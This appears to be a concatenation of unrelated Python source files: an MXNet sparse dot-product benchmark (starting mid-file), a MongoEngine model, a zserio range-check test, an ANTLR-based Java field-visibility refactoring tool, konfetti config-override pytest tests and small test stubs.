'data_name': 'avazu-app.t',
'data_origin_name': 'avazu-app.t.bz2',
'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/avazu-app.t.bz2",
'feature_dim': 1000000,
'm': 500,
'batch_size': [64, 128]
}
def measure_cost(repeat, f, *args, **kwargs):
# start bench
start = time.time()
results = []
for i in range(repeat):
results.append(f(*args, **kwargs))
for result in results:
result.wait_to_read()
end = time.time()
diff = end - start
return diff / repeat
def test_dot_real(data_dict):
def get_iter(path, data_shape, batch_size):
data_train = mx.io.LibSVMIter(data_libsvm=path,
data_shape=data_shape,
batch_size=batch_size)
data_iter = iter(data_train)
return data_iter
data_dir = os.path.join(os.getcwd(), 'data')
path = os.path.join(data_dir, data_dict['data_name'])
if not os.path.exists(path):
get_bz2_data(
data_dir,
data_dict['data_name'],
data_dict['url'],
data_dict['data_origin_name']
)
assert os.path.exists(path)
k = data_dict['feature_dim']
m = data_dict['m']
density = estimate_density(path, data_dict['feature_dim'])
mini_path = os.path.join(data_dir, data_dict['data_mini'])
if not os.path.exists(mini_path):
os.system("head -n 2000 %r > %r" % (path, mini_path))
assert os.path.exists(mini_path)
print("Running Benchmarking on %r data" % data_dict['data_mini'])
    for batch_size in data_dict['batch_size']:  # iterate through the different batch sizes of choice
print("batch_size is %d" % batch_size)
# model
data_shape = (k, )
train_iter = get_iter(mini_path, data_shape, batch_size)
weight = mx.nd.random.uniform(low=0, high=1, shape=(k, m))
csr_data = []
dns_data = []
num_batch = 0
for batch in train_iter:
data = train_iter.getdata()
csr_data.append(data)
dns_data.append(data.tostype('default'))
num_batch += 1
bag_of_data = [csr_data, dns_data]
num_repeat = 5
costs = []
for d in bag_of_data:
weight.wait_to_read()
cost = 0.
count = 0
for d_batch in d:
d_batch.wait_to_read()
cost += measure_cost(num_repeat, mx.nd.dot, d_batch, weight)
count += 1
costs.append(cost/count)
t_sparse = costs[0]
t_dense = costs[1]
ratio = t_dense / t_sparse
print('density(%)\tn\tm\tk\tt_dense/t_sparse\tt_dense\tt_sparse')
fmt = "%0.4f\t\t%d\t%d\t%d\t%0.2f\t\t\t%0.4f\t%0.6f"
print(fmt % (density * 100, batch_size, m, k, ratio, t_dense, t_sparse))
def test_dot_synthetic():
"""benchmark mx.nd.dot(sparse_ndarray, dense_ndarray) with given density.
`t_sparse` is the time cost of dot(csr, dns), while `t_dense` is the time cost
of dot(dns, dns), with the same matrix except that it is in default storage type.
"""
def measure_cost_forward_baseline(repeat, dot, lhs, rhs):
start = time.time()
for i in range(repeat):
dot(lhs, rhs)
end = time.time()
diff = end - start
return diff / repeat
def measure_cost_backward_baseline(repeat, dot, transpose, lhs, rhs):
start = time.time()
for i in range(repeat):
dot(transpose(lhs), rhs)
end = time.time()
diff = end - start
return diff / repeat
def bench_dot_forward(m, k, n, density, ctx, repeat):
set_default_context(ctx)
dns = mx.nd.random.uniform(shape=(k, n)).copyto(ctx)
data_shape = (m, k)
csr_data = rand_ndarray(data_shape, 'csr', density)
dns_data = csr_data.tostype('default')
rhs_dns_np = dns.asnumpy()
lhs_csr_sp = sp.csr_matrix(dns_data.asnumpy()) # csr in scipy
        lhs_dns_np = lhs_csr_sp.toarray()  # scipy sparse matrices have no tostype(); use a dense ndarray
data = [dns_data, csr_data]
costs = []
for d in data:
dns.wait_to_read()
d.wait_to_read()
cost = measure_cost(repeat, mx.nd.dot, d, dns)
costs.append(cost)
ratio = costs[0] / costs[1]
costs_baseline = []
cost = measure_cost_forward_baseline(repeat, np.dot, lhs_dns_np, rhs_dns_np)
costs_baseline.append(cost)
cost = measure_cost_forward_baseline(repeat, sp.spmatrix.dot, lhs_csr_sp, rhs_dns_np)
costs_baseline.append(cost)
ratio_baseline = costs_baseline[0] / costs_baseline[1]
fmt = "%0.1f\t\t%s\t%d\t%d\t%d\t%0.2f\t\t\t%0.2f\t%0.5f\t\t%0.2f\t\t\t\t%0.6f\t%0.5f"
print(fmt % (density * 100, str(ctx), n, m, k, ratio, costs[0], costs[1],
ratio_baseline, costs_baseline[0], costs_baseline[1]))
def bench_dot_backward(m, k, n, density, ctx, repeat):
set_default_context(ctx)
dns = mx.nd.random.uniform(shape=(m, n)).copyto(ctx)
data_shape = (m, k)
csr_data = rand_ndarray(data_shape, 'csr', density)
dns_data = csr_data.tostype('default')
rhs_dns_np = dns.asnumpy()
lhs_csr_sp = sp.csr_matrix(dns_data.asnumpy())
        lhs_dns_np = lhs_csr_sp.toarray()  # scipy sparse matrices have no tostype(); use a dense ndarray
data = [dns_data, csr_data]
costs = []
for d in data:
dns.wait_to_read()
d.wait_to_read()
cost = measure_cost(repeat, mx.nd.dot, d, dns, transpose_a=True)
costs.append(cost)
ratio = costs[0] / costs[1]
costs_baseline = []
cost = measure_cost_backward_baseline(repeat, np.dot, np.transpose, lhs_dns_np, rhs_dns_np)
costs_baseline.append(cost)
cost = measure_cost_backward_baseline(repeat, sp.spmatrix.dot, sp.spmatrix.transpose, lhs_csr_sp, rhs_dns_np)
costs_baseline.append(cost)
ratio_baseline = costs_baseline[0] / costs_baseline[1]
fmt = "%0.1f\t\t%s\t%d\t%d\t%d\t%0.2f\t\t\t%0.2f\t%0.5f\t\t%0.2f\t\t\t\t%0.6f\t%0.5f"
print(fmt % (density * 100, str(ctx), n, m, k, ratio, costs[0], costs[1],
ratio_baseline, costs_baseline[0], costs_baseline[1]))
print("A = sparse NDArray of shape(m, k)")
print("B = dense NDArray of shape(k, n)")
print("dot_forward\tdot(csr, dns)")
print('density(%)\tcontext\tn\tm\tk\tt_dense/t_sparse\tt_dense\tt_sparse'
'\tt_scipy_dense/t_scipy_sparse\tt_scipy_dense\tt_scipy_sparse')
check_call(_LIB.MXSetNumOMPThreads(ctypes.c_int(args.num_omp_threads)))
# TODO(haibin) make these runtime options
m = 512
k = [50000, 100000]
n = [64, 128]
density = [1.00, 0.90, 0.70, 0.50, 0.30, 0.20, 0.10, 0.07, 0.05, 0.02, 0.01, 0.005, 0.001]
num_repeat = 10
# contexts = [mx.cpu(), mx.gpu(0)]
contexts = [mx.cpu()]
for i in range(2):
for ctx in contexts:
for den in density:
bench_dot_forward(m, k[i], n[i], den, ctx, num_repeat)
print("dot_backward\tdot(csr.T, dns)")
print('density(%)\tcontext\tn\tm\tk\tt_dense/t_sparse\tt_dense\tt_sparse'
'\tt_scipy_dense/t_scipy_sparse\tt_scipy_dense\tt_scipy_sparse')
for i in range(2):
for ctx in contexts:
for den in density:
bench_dot_backward(m, k[i], n[i], den, ctx, num_repeat)
if __name__ == "__main__":
test_dot_real(avazu)
test_dot_real(kdda)
test_dot_synthetic()
|
1710080
|
import datetime
from my_app import db
class Product(db.Document):
created_at = db.DateTimeField(
default=datetime.datetime.now, required=True
)
key = db.StringField(max_length=255, required=True)
name = db.StringField(max_length=255, required=True)
price = db.DecimalField()
def __repr__(self):
return '<Product %r>' % self.id
|
1710088
|
import unittest
import zserio
from testutils import getZserioApi
class VarSizeRangeCheckTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.api = getZserioApi(__file__, "with_range_check_code.zs",
extraArgs=["-withRangeCheckCode"]).varsize_range_check
def testVarSizeLowerBound(self):
self._checkVarSizeValue(VARSIZE_LOWER_BOUND)
def testVarSizeUpperBound(self):
self._checkVarSizeValue(VARSIZE_UPPER_BOUND)
def testVarSizeBelowLowerBound(self):
with self.assertRaises(zserio.PythonRuntimeException):
self._checkVarSizeValue(VARSIZE_LOWER_BOUND - 1)
def testVarSizeAboveUpperBound(self):
with self.assertRaises(zserio.PythonRuntimeException):
self._checkVarSizeValue(VARSIZE_UPPER_BOUND + 1)
def _checkVarSizeValue(self, value):
varSizeRangeCheckCompound = self.api.VarSizeRangeCheckCompound(value)
bitBuffer = zserio.serialize(varSizeRangeCheckCompound)
readVarSizeRangeCheckCompound = zserio.deserialize(self.api.VarSizeRangeCheckCompound, bitBuffer)
self.assertEqual(varSizeRangeCheckCompound, readVarSizeRangeCheckCompound)
VARSIZE_LOWER_BOUND = zserio.limits.VARSIZE_MIN
VARSIZE_UPPER_BOUND = zserio.limits.VARSIZE_MAX
|
1710101
|
from gen.javaLabeled.JavaLexer import JavaLexer
try:
import understand as und
except ImportError as e:
print(e)
from antlr4 import *
from antlr4.TokenStreamRewriter import TokenStreamRewriter
from gen.javaLabeled.JavaParserLabeled import JavaParserLabeled
from gen.javaLabeled.JavaParserLabeledListener import JavaParserLabeledListener
class IncreaseFieldVisibilityRefactoringListener(JavaParserLabeledListener):
"""
## Introduction
# TODO: Change name to decrease
1. Private
2. Protected
3. Package (no modifier)
4. Public
Increase the visibility of a field from private to package, package to protected or protected to public.
## Pre and Post Conditions
### Pre Conditions:
1. User must enter the field's name, and the source class's name for the refactoring
in order to increase the target field's visibility.
### Post Conditions:
No specific Post Condition
"""
def __init__(self, common_token_stream: CommonTokenStream = None, source_class=None, field_name: str = None):
"""To implement Increase Field Visibility refactoring based on its actors.
Detects the required field and increases/changes its visibility status.
Args:
common_token_stream (CommonTokenStream): A stream of tokens generated by parsing the main file using the ANTLR parser generator
source_class (str): Name of the class in which the refactoring has to be done
field_name (str): Name of the field whose visibility status has to be changed
Returns:
No returns
"""
if field_name is None:
self.field_name = ""
else:
self.field_name = field_name
if source_class is None:
self.source_class = ""
else:
self.source_class = source_class
if common_token_stream is None:
raise ValueError('common_token_stream is None')
else:
self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
self.is_source_class = False
self.detected_field = None
self.detected_method = None
self.TAB = "\t"
self.NEW_LINE = "\n"
self.code = ""
self.temp_declaration_code = ""
def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
class_identifier = ctx.IDENTIFIER().getText()
if class_identifier == self.source_class:
self.is_source_class = True
else:
self.is_source_class = False
def exitFieldDeclaration(self, ctx: JavaParserLabeled.FieldDeclarationContext):
if not self.is_source_class:
return None
grand_parent_ctx = ctx.parentCtx.parentCtx
# field_identifier = ctx.variableDeclarators().getText().split(",")
field_identifier = ctx.variableDeclarators().variableDeclarator(0).variableDeclaratorId().IDENTIFIER().getText()
if self.field_name in field_identifier:
if not grand_parent_ctx.modifier():
self.token_stream_rewriter.replaceRange(
from_idx=ctx.typeType().start.tokenIndex,
to_idx=ctx.typeType().stop.tokenIndex,
text='private ' + ctx.typeType().getText()
)
elif grand_parent_ctx.modifier(0).getText() == 'public':
self.token_stream_rewriter.replaceRange(
from_idx=grand_parent_ctx.modifier(0).start.tokenIndex,
to_idx=grand_parent_ctx.modifier(0).stop.tokenIndex,
text='private')
elif grand_parent_ctx.modifier(0).getText() != 'private':
self.token_stream_rewriter.replaceRange(
from_idx=grand_parent_ctx.modifier(0).start.tokenIndex,
to_idx=grand_parent_ctx.modifier(0).stop.tokenIndex,
text='private ' + grand_parent_ctx.modifier(0).getText())
# generate accessor and mutator methods
# Accessor body
new_code = '\n\t'
new_code += 'public ' + ctx.typeType().getText() + ' get' + str.capitalize(self.field_name)
new_code += '() { \n\t\t return this.' + self.field_name + ';' + '\n\t}'
# Mutator body
new_code += '\n\t'
new_code += 'public void set' + str.capitalize(self.field_name)
new_code += '(' + ctx.typeType().getText() + ' ' + self.field_name + ') { \n\t\t'
new_code += 'this.' + self.field_name + ' = ' + self.field_name + ';' + '\n\t}\n'
self.token_stream_rewriter.insertAfter(ctx.stop.tokenIndex, new_code)
class PropagationIncreaseFieldVisibilityRefactoringListener(JavaParserLabeledListener):
def __init__(self, common_token_stream: CommonTokenStream = None, using_field_name=None, object_name=None,
propagated_class_name=None, action_to_do=None):
"""
Used for propagation purposes in the other classes of the project: implement the propagation
Args:
common_token_stream (CommonTokenStream): A stream of tokens generated by parsing the main file using the ANTLR parser generator
using_field_name (str): Name of the field which has to be propagated
object_name (str): Name of the objects that need to be changed with the propagation operation
propagated_class_name (str): Name of the class in which the propagation operation needs to be implemented
Returns: No returns
"""
if using_field_name is None:
self.using_field_name = []
else:
self.using_field_name = using_field_name
if action_to_do is None:
self.action_to_do = []
else:
self.action_to_do = action_to_do
if object_name is None:
self.object_name = []
else:
self.object_name = object_name
if propagated_class_name is None:
self.propagated_class_name = []
else:
self.propagated_class_name = propagated_class_name
if common_token_stream is None:
raise ValueError('common_token_stream is None')
else:
self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
self.is_class = False
def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
# print("Propagation started, please wait...")
class_identifier = ctx.IDENTIFIER().getText()
if class_identifier in self.propagated_class_name:
self.is_class = True
print("Propagation started, please wait......")
else:
self.is_class = False
def is_before_equal(self, parent_ctx):
try:
if str(type(
parent_ctx)) == "<class 'gen.javaLabeled.JavaParserLabeled.JavaParserLabeled.Expression21Context'>":
if str(type(parent_ctx.children[
0])) == "<class 'gen.javaLabeled.JavaParserLabeled.JavaParserLabeled.Expression1Context'>":
return True
return False
except:
return False
def getoperator(self, str):
return (str[0:1])
def check_is_expression_obj_and_field(self, ctx):
if str(ctx.children[0].getText()) in self.object_name and str(
ctx.children[2].getText()) == self.using_field_name:
return True
else:
return False
# print(ctx.children[0].getText())
# print(ctx.children[1].getText())
# print(ctx.children[2].getText())
def enterExpression1(self, ctx: JavaParserLabeled.Expression1Context):
if not self.is_class: return
        parent_ctx = ctx.parentCtx
if self.is_before_equal(parent_ctx):
# print("going to set")
if self.action_to_do == "Get":
return None
# {{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
if isinstance(parent_ctx, JavaParserLabeled.Expression21Context):
# print("parent_ctx.children[1]:", str(parent_ctx.children[1]))
if (str(parent_ctx.children[1]) in ["+=", "-=", "*=", "/=", "&=", "|=", "^=", ">>=", ">>>=", "<<=",
"%="]):
if self.action_to_do == "Get":
return None
if ctx.expression() is not None:
if ctx.expression().primary() is not None:
if ctx.expression().primary().IDENTIFIER().getText() in self.object_name:
parent_ctx = ctx.parentCtx
count = parent_ctx.getChildCount()
if count == 3:
expression_text = parent_ctx.children[2].getText()
self.token_stream_rewriter.replaceRange(
from_idx=parent_ctx.start.tokenIndex,
to_idx=parent_ctx.stop.tokenIndex,
text=ctx.expression().primary().IDENTIFIER().getText() + '.' + 'set' + str.capitalize(
ctx.IDENTIFIER().getText()) + '(' + ctx.expression().primary().IDENTIFIER().getText() + '.get' + str.capitalize(
ctx.IDENTIFIER().getText()) + '() ' + self.getoperator(
str(parent_ctx.children[1])) + "( " + expression_text + ') )'
)
return True
# }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
if ctx.expression() is not None:
if ctx.expression().primary() is not None:
if ctx.expression().primary().IDENTIFIER().getText() in self.object_name:
# print("ctx.expression().primary().IDENTIFIER().getText()=",ctx.expression().primary().IDENTIFIER().getText())
parent_ctx = ctx.parentCtx
count = parent_ctx.getChildCount()
if count == 3:
expression_text = parent_ctx.children[2].getText()
self.token_stream_rewriter.replaceRange(
from_idx=parent_ctx.start.tokenIndex,
to_idx=parent_ctx.stop.tokenIndex,
text=ctx.expression().primary().IDENTIFIER().getText() + '.' + 'set' + str.capitalize(
ctx.IDENTIFIER().getText()) + '(' + expression_text + ')'
)
else: # expression is after =
if self.action_to_do == "Set":
return None
if self.check_is_expression_obj_and_field(ctx):
if ctx.expression() is not None:
if ctx.expression().primary() is not None:
if (
ctx.expression().primary().IDENTIFIER().getText() in self.object_name and ctx.IDENTIFIER().getText() == self.using_field_name):
self.token_stream_rewriter.replaceRange(
from_idx=ctx.start.tokenIndex,
to_idx=ctx.stop.tokenIndex,
text=ctx.expression().primary().IDENTIFIER().getText() + '.' + 'get' + str.capitalize(
ctx.IDENTIFIER().getText()) + '()'
)
# if ctx.expression() != None:
# print("ctx.getText()===============",ctx.getText())
# self.check_is_exprresion_obj_and_field(ctx)
# TODO: Check or remove this comments
# def enterVariableDeclarator(self, ctx: JavaParserLabeled.VariableDeclaratorContext):
# if self.action_to_do == "Set":
# return None
#
# if not self.is_class:
# return None
#
# grand_child_ctx = ctx.variableInitializer().expression()
# if (str(type(
# grand_child_ctx)) == "<class 'gen.javaLabeled.JavaParserLabeled.JavaParserLabeled.Expression1Context'>"):
# usingfieldidentifier = grand_child_ctx.IDENTIFIER().getText()
#
# if usingfieldidentifier == self.using_field_name:
# objectidentifier = grand_child_ctx.expression().primary().IDENTIFIER().getText()
#
# if objectidentifier in self.object_name:
# self.token_stream_rewriter.replaceRange(
# from_idx=grand_child_ctx.start.tokenIndex,
# to_idx=grand_child_ctx.stop.tokenIndex,
# text=grand_child_ctx.expression().primary().IDENTIFIER().getText() + '.' + 'get' + str.capitalize(
# grand_child_ctx.IDENTIFIER().getText()) + '()'
# )
class PropagationIncreaseFieldVisibilityGetObjectsRefactoringListener(JavaParserLabeledListener):
def __init__(self, common_token_stream: CommonTokenStream = None, source_class=None,
propagated_class_name=None):
"""Used for propagation purposes in the other classes of the project:
Detect the objects which have to be propagated
Args:
common_token_stream (CommonTokenStream): A stream of tokens generated by parsing the main file using the ANTLR parser generator
source_class (str): Name of the class in which the propagation has to be implemented
propagated_class_name (str): Name of the class which has to be propagated
Returns: No returns
"""
if source_class is None:
self.source_class = []
else:
self.source_class = source_class
if propagated_class_name is None:
self.propagated_class_name = []
else:
self.propagated_class_name = propagated_class_name
if common_token_stream is None:
raise ValueError('common_token_stream is None')
else:
self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
self.is_class = False
self.current_class = ''
self.objects = list()
def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
class_identifier = ctx.IDENTIFIER().getText()
if class_identifier in self.propagated_class_name:
self.is_class = True
print("Propagation get object started, please wait...")
self.current_class = class_identifier
else:
self.is_class = False
def enterVariableDeclarator(self, ctx: JavaParserLabeled.VariableDeclaratorContext):
if not self.is_class:
return None
grand_parent_ctx = ctx.parentCtx.parentCtx
if grand_parent_ctx.typeType().classOrInterfaceType() is not None:
class_name = grand_parent_ctx.typeType().classOrInterfaceType().IDENTIFIER(0).getText()
if class_name in self.source_class:
object_name = ctx.variableDeclaratorId().IDENTIFIER().getText()
self.objects.append(object_name)
def main():
print("Increase Field Visibility")
# Note: If a class is not in a package -> package_name=(Unnamed_Package)
udb_path = "/data/Dev/JavaSample/JavaSample.udb"
package_name = "my_package"
class_name = "Source"
field_name = "number3"
file_list_to_be_propagate = set()
propagate_classes = set()
file_list_to_be_propagate_for_setby = set()
propagate_classes_for_setby = set()
file_list_to_be_propagate_for_getby = set()
propagate_classes_for_getby = set()
file_list_include_file_name_that_edited = ""
main_file = ""
db = und.open(udb_path)
# TODO: Check filter
for field in db.ents("public variable"):
if (str(field) == str(class_name + "." + field_name) and str(
field.parent().ref("Java Containin").ent()) == package_name):
print(field)
if field.parent().parent().relname() is not None:
main_file = field.parent().parent().longname(True)
print("mainfile=", main_file)
else:
for ref in field.refs("Definein"):
main_file = (ref.file().longname())
for ref in field.refs("Setby , Modifyby"):
if not (str(ref.ent()) == str(field.parent())
or str(ref.ent().parent()) == str(field.parent())):
propagate_classes_for_setby.add(str(ref.ent().parent().simplename()))
file_list_to_be_propagate_for_setby.add(ref.file().longname(True))
for ref in field.refs("Useby"):
                if not (str(ref.ent()) == str(field.parent()) or str(ref.ent().parent()) == str(field.parent())):
propagate_classes_for_getby.add(str(ref.ent().parent().simplename()))
file_list_to_be_propagate_for_getby.add(ref.file().longname(True))
file_list_to_be_propagate = list(file_list_to_be_propagate)
propagate_classes = list(propagate_classes)
if main_file == "":
print("main file not found!!!")
return False
stream = FileStream(main_file, encoding='utf8')
# Step 2: Create an instance of AssignmentStLexer
lexer = JavaLexer(stream)
# Step 3: Convert the input source into a list of tokens
token_stream = CommonTokenStream(lexer)
# Step 4: Create an instance of the AssignmentStParser
parser = JavaParserLabeled(token_stream)
parser.getTokenStream()
parse_tree = parser.compilationUnit()
my_listener = IncreaseFieldVisibilityRefactoringListener(common_token_stream=token_stream,
source_class=class_name,
field_name=field_name)
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener)
print("my_listener is walked")
# print(my_listener.token_stream_rewriter.getDefaultText())
with open(main_file, mode='w', encoding="utf-8", newline='') as f:
f.write(my_listener.token_stream_rewriter.getDefaultText())
print("file_list_to_be_propagate:", file_list_to_be_propagate)
for file in file_list_to_be_propagate_for_getby:
print("file_list_to_be_propagate_for_Getby:", file)
stream = FileStream(file, encoding='utf8')
# input_stream = StdinStream()
# Step 2: Create an instance of AssignmentStLexer
lexer = JavaLexer(stream)
# Step 3: Convert the input source into a list of tokens
token_stream = CommonTokenStream(lexer)
# Step 4: Create an instance of the AssignmentStParser
parser = JavaParserLabeled(token_stream)
parser.getTokenStream()
parse_tree = parser.compilationUnit()
my_listener_get_object = PropagationIncreaseFieldVisibilityGetObjectsRefactoringListener(token_stream,
source_class=class_name,
propagated_class_name=propagate_classes_for_getby)
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener_get_object)
print("my_listener_get_object.objects:", my_listener_get_object.objects)
my_listener = PropagationIncreaseFieldVisibilityRefactoringListener(common_token_stream=token_stream,
using_field_name=field_name,
object_name=my_listener_get_object.objects,
propagated_class_name=propagate_classes_for_getby,
action_to_do="Get")
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener)
# print(my_listener.token_stream_rewriter.getDefaultText())
with open(file, mode='w', encoding="utf-8", newline='') as f:
f.write(my_listener.token_stream_rewriter.getDefaultText())
for file in file_list_to_be_propagate_for_setby:
print("file_list_to_be_propagate_for_setby:", file)
stream = FileStream(file, encoding='utf8')
# Step 2: Create an instance of AssignmentStLexer
lexer = JavaLexer(stream)
# Step 3: Convert the input source into a list of tokens
token_stream = CommonTokenStream(lexer)
# Step 4: Create an instance of the AssignmentStParser
parser = JavaParserLabeled(token_stream)
parser.getTokenStream()
parse_tree = parser.compilationUnit()
my_listener_get_object = PropagationIncreaseFieldVisibilityGetObjectsRefactoringListener(token_stream,
source_class=class_name,
propagated_class_name=propagate_classes_for_setby)
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener_get_object)
print("my_listener_get_object.objects:", my_listener_get_object.objects)
my_listener = PropagationIncreaseFieldVisibilityRefactoringListener(common_token_stream=token_stream,
using_field_name=field_name,
object_name=my_listener_get_object.objects,
propagated_class_name=propagate_classes_for_setby,
action_to_do="Set")
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener)
with open(file, mode='w', encoding="utf-8", newline='') as f:
f.write(my_listener.token_stream_rewriter.getDefaultText())
if __name__ == '__main__':
main()
|
1710118
|
import sys
import pytest
from konfetti import Konfig
from konfetti.exceptions import ForbiddenOverrideError
pytestmark = [pytest.mark.usefixtures("settings")]
skip_if_py2 = pytest.mark.skipif(sys.version_info[0] == 2, reason="Async syntax is not supported on Python 2.")
def test_override_function(testdir):
"""`override` decorator allows users to set custom config values per test function."""
testdir.makepyfile(
"""
from settings import config
import pytest
@pytest.fixture
def example():
return "test"
@config.override(INTEGER=123)
def test_override_function():
assert config.INTEGER == 123
@config.override(INTEGER=123)
def test_override_function_with_fixture(example):
assert config.INTEGER == 123
assert example == "test"
@config.override(INTEGER=123)
@pytest.mark.parametrize("x", [1, 2])
def test_override_function_with_parametrize(example, x):
assert config.INTEGER == 123
assert example == "test"
assert isinstance(x, int)
@pytest.mark.parametrize("x", [1, 2])
@config.override(INTEGER=123)
def test_override_function_with_parametrize_first(example, x):
assert config.INTEGER == 123
assert example == "test"
assert isinstance(x, int)
def test_disable():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest("-s")
result.assert_outcomes(passed=7)
def test_override_vault_secret(testdir):
"""Vault vault should be overridden correctly."""
testdir.makepyfile(
"""
from settings import config
@config.override(SECRET="not secret")
def test_override_function():
assert config.SECRET == "not secret"
def test_disable():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=2)
def test_override_method(testdir):
"""`override` decorator also works for class methods."""
testdir.makepyfile(
"""
from settings import config
import pytest
@pytest.fixture
def example():
return "test"
class TestOverride:
@config.override(INTEGER=123)
def test_override(self):
assert config.INTEGER == 123
@config.override(INTEGER=123)
def test_override_with_fixture(self, example):
assert config.INTEGER == 123
assert example == "test"
def test_disable_on_method(self):
assert config.INTEGER == 1
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=4)
def test_override_class(testdir):
"""`override` decorator also works for classes."""
testdir.makepyfile(
"""
from settings import config
import pytest
@pytest.fixture
def example():
return "test"
@config.override(INTEGER=123)
class TestOverride:
def test_override(self):
assert config.INTEGER == 123
def test_override_with_fixture(self, example):
assert config.INTEGER == 123
assert example == "test"
@config.override(INTEGER=456)
def test_another_override(self, example):
assert config.INTEGER == 456
assert example == "test"
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=4)
def test_override_class_with_setup(testdir):
"""`override` decorator also works for classes that have custom `setup_class` and `teardown_class` methods."""
testdir.makepyfile(
"""
from settings import config
@config.override(INTEGER=123)
class TestOverride:
@classmethod
def setup_class(cls):
cls.attr = 42
def test_override(self):
assert self.attr == 42
assert config.INTEGER == 123
def test_another_override(self):
assert self.attr == 42
assert config.INTEGER == 123
@classmethod
def teardown_class(cls):
print("TearDown call")
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest("-s")
result.assert_outcomes(passed=3)
result.stdout.fnmatch_lines(["*TearDown call*"])
def test_override_unittest_class(testdir):
"""`override` decorator also works for unittest-style classes."""
testdir.makepyfile(
"""
import unittest
from settings import config
@config.override(INTEGER=123)
class TestOverride(unittest.TestCase):
def test_override(self):
assert config.INTEGER == 123
def test_another_override(self):
assert config.INTEGER == 123
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=3)
def test_override_unittest_class_custom_setup(testdir):
"""If unittest-style class has custom `setUp` and `tearDown` then `override` should work as well."""
testdir.makepyfile(
"""
import unittest
from settings import config
@config.override(INTEGER=123)
class TestOverride(unittest.TestCase):
def setUp(self):
self.func = 1
@classmethod
def setUpClass(cls):
cls.cls = 2
def test_override(self):
assert self.func == 1
assert self.cls == 2
assert config.INTEGER == 123
def test_another_override(self):
assert self.func == 1
assert self.cls == 2
assert config.INTEGER == 123
def tearDown(self):
print("TearDown call")
@classmethod
def tearDownClass(cls):
print("TearDownClass call")
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest("-s")
result.assert_outcomes(passed=3)
result.stdout.fnmatch_lines(["*TearDownClass call*"])
result.stdout.fnmatch_lines(["*TearDown call*"])
def test_override_custom_setup_error(testdir):
"""When an error occurs in a custom setup method config should be unconfigured."""
testdir.makepyfile(
"""
from settings import config
@config.override(INTEGER=123)
class TestOverride:
@classmethod
def setup_class(cls):
1 / 0
def test_override(self):
print("NOT EXECUTED")
@classmethod
def teardown_class(cls):
1 / 0
def test_disabled():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest("-s")
result.assert_outcomes(passed=1, error=1)
assert "NOT EXECUTED" not in result.stdout._log_text
@skip_if_py2
def test_async_test(testdir):
"""`override` decorator works for async tests."""
testdir.makepyfile(
"""
import pytest
from settings import config
pytestmark = pytest.mark.asyncio
@config.override(INTEGER=123)
async def test_override_per_test():
assert config.INTEGER == 123
async def test_disable():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=2)
def test_override_unknown_type(config):
"""`override` can't decorate arbitrary types."""
with pytest.raises(TypeError, match="Don't know how to use `override` for `int`"):
config.override(INTEGER=123)(123)
def test_override_unknown_option():
"""If an option passed to `override` doesn't exist in the config module an error should be risen.
Active only with `strict_override` config option.
"""
config = Konfig(strict_override=True)
with pytest.raises(
ForbiddenOverrideError,
match="Can't override `NOT_EXIST` config option, because it is not defined in the config module",
):
with config.override(NOT_EXIST=123):
pass
def test_strict_override_valid():
config = Konfig(strict_override=True)
with config.override(INTEGER=123):
assert config.INTEGER == 123
def test_override_context_manager(config):
"""It is possible to use it as a context manager."""
with config.override(INTEGER=123):
assert config.INTEGER == 123
assert config.INTEGER == 1
def test_override_context_manager_nested(testdir):
"""Multiple levels of overriding are nested."""
testdir.makepyfile(
"""
from settings import config
def test_context_manager():
with config.override(INTEGER=123):
with config.override(KEY="overridden"):
assert config.INTEGER == 123
assert config.KEY == "overridden"
assert config.KEY == "value"
assert config.INTEGER == 123
assert config.INTEGER == 1
assert config.KEY == "value"
@config.override(KEY="foo")
def test_context_manager_with_decorator():
assert config.KEY == "foo"
with config.override(INTEGER=123):
with config.override(KEY="overridden"):
assert config.INTEGER == 123
assert config.KEY == "overridden"
assert config.KEY == "foo"
assert config.INTEGER == 123
assert config.INTEGER == 1
assert config.KEY == "foo"
def test_disable():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=3)
def test_no_setup_on_override(mocked_import_config_module):
"""If overridden option is accessed, then config is not loaded."""
config = Konfig(strict_override=False)
with config.override(EXAMPLE="awesome"):
assert config.EXAMPLE == "awesome"
mocked_import_config_module.assert_not_called()
def test_setup_on_override(mocked_import_config_module):
"""If non-overridden option is accessed, then config should be loaded."""
config = Konfig()
with config.override(SOMETHING="awesome"):
assert config.EXAMPLE == "test"
# Py2.7, Py3.5: replace with `assert_called` when 2.7/3.5 support will be dropped.
assert mocked_import_config_module.called is True
assert mocked_import_config_module.call_count >= 1
|
1710121
|
from utils import run_with_curio
@run_with_curio
async def test_verify(httpbin_secure):
pass
@run_with_curio
async def test_cert(httpbin_secure):
pass
|
1710125
|
import sys
import os
import subprocess
import numpy
